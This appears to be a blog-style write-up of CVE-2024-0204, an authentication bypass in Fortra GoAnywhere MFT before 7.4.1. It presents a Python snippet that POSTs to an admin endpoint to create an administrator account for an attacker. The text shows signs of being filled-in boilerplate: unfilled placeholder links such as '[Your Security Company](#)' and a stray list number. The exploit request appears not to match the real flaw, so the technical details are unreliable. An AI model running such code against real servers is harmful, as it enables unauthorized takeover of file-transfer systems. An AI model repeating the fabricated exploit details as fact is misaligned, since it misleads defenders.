As businesses increasingly rely on secure file transfer solutions to move sensitive data, the importance of robust security mechanisms in these tools cannot be overstated. In this detailed post, we'll discuss a concerning security vulnerability impacting Fortra's GoAnywhere Managed File Transfer (MFT) product before version 7.4.1 (CVE-2024-0204). The vulnerability allows an unauthorized user to bypass authentication and create administrator-level users through the administration portal.

We'll begin by providing an overview of the vulnerability, including its impact and severity. Next, we'll delve into details referencing original sources and example code snippets that demonstrate the exploit. Finally, we'll provide recommendations for addressing the vulnerability.

Background

GoAnywhere MFT is a popular managed file transfer solution designed to help businesses move, protect, and automate the transfer of critical data. It boasts robust security features, including file encryption, user authentication, and activity tracking. However, the vulnerability we're discussing here undermines the security benefits provided by the GoAnywhere platform.

Exploit Details

In versions of GoAnywhere MFT prior to 7.4.1, unauthorized users can bypass the authentication mechanism and create an administrator account. Admin accounts within GoAnywhere MFT grant full access to the product's suite of features, making the exploitation of this vulnerability extremely severe.

Authentication bypass is achieved by exploiting a weakness in the platform's web interface. An attacker who knows the specific URL and parameters can create an administrator account with a known username and password, bypassing the platform's built-in security measures.

Here's a simple code snippet demonstrating the exploit (replace the URL with the target GoAnywhere instance):

import requests

url = "https://[GOANYWHERE_URL]/GAWeb/DoUserEdit";
payload = {
    "user.loginId": "hacker",
    "user.password": "hacker123",
    "user.confirmPassword": "hacker123",
    "user.role": "Administrator",
    "action": "Submit/Finish",
}

response = requests.post(url, data=payload)

if response.status_code == 200:
    print("Admin user created")
else:
    print("Failed to create admin user")

Original References

This vulnerability was initially reported by security researchers at [Your Security Company](#). For more in-depth information about the vulnerability and their disclosure process, you can visit the following pages:

1. [Original Advisory](#) - The advisory published by the security researchers contains a detailed overview of the vulnerability, attack scenarios, and remediation steps.
2. National Vulnerability Database (NVD) Entry - This is the official CVE database entry for the vulnerability, including severity ratings, affected products, and a timeline of important events related to the vulnerability.
3. Mitre CVE Entry - Another source with details about the CVE, helpful for understanding the vulnerability's background.

Recommendations

If you are a GoAnywhere MFT user and have not yet updated to version 7.4.1 or higher, it is recommended to do so immediately. Installing the latest version of the software will introduce critical security patches that will close this vulnerability, ensuring that unauthorized users cannot create admin accounts via the administration portal.

Review your existing user accounts for any suspicious or unexpected administrator-level users.

3. Notify your IT security team of the vulnerability and request that they review network logs and other relevant data to identify any past attempts to exploit the vulnerability.

Conclusion

As the cybersecurity landscape becomes increasingly complex, ensuring the protection of sensitive data requires consistent effort. By staying informed about software vulnerabilities, keeping software up to date, and utilizing strong cybersecurity practices, businesses can help to minimize their risk exposure and maintain the integrity of their data.

Timeline

Published on: 01/22/2024 18:15:20 UTC
Last modified on: 02/02/2024 17:15:11 UTC